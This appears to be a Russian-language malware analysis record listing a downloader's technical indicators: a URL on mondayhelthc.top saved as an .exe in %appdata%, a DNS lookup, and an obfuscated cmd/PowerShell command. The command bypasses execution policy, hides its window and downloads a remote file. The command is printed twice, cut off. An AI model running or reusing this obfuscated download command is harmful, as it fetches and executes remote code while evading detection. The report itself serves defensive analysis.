Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowE^RsH^eL^L^.eX^e -E^X^E^cu^TiO^N^po^L^i^Cy^ byp^AsS ^-NoP^rOFi^Le -wi^n^do^w^sT^YLe^ ^hI^D^dEN (N^EW-o^BjEC^T^ ^sy^S^tem^.NeT.wEB^c^liENT).DOW^n^L^OA^d^Fil^E^('http://mo...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "PowE^RsH^eL^L^.eX^e -E^X^E^cu^TiO^N^po^L^i^Cy^ byp^AsS ^-NoP^rOFi^Le -wi^n^do^w^sT^YLe^ ^hI^D^dEN (N^EW-o^BjEC^T^ ^sy^S^tem^.NeT.wEB^c^liENT).DOW^n^L^OA^d^Fil^E^('http://mo...' (со скрытым окном)